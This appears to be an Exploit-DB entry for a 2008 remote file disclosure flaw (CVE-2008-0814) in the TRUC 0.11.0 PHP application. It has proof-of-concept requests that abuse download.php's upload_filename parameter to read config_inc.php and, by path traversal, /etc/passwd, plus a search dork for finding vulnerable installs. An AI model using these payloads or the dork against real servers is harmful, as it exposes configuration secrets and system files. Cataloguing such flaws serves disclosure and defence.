EXPLOITS

TRUC 0.11.0 - 'download.php' Remote File Disclosure

Author: GoLd_M
type: webapps
platform: php
port: 
date_added: 2008-02-15  
date_updated: 2016-11-14  
verified: 1  
codes: OSVDB-42184;CVE-2008-0814  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comtruc_0.11.0.tar.gz  

raw file: 5129.txt  

### TRUC 0.11.0 (download.php) Remote File Disclosure Vulnerability
### http://switch.dl.sourceforge.net/sourceforge/truc/truc_0.11.0.tar.gz
### POC :
### /download.php?upload_filename=config_inc.php
### /download.php?upload_filename=../../../../../../../../etc/passwd
### Dork : TRUC 0.11.0 :: © 2006 by ASDIS :
### I'm TRYAGI  ;)  -- Tryag.cc/cc

# milw0rm.com [2008-02-16]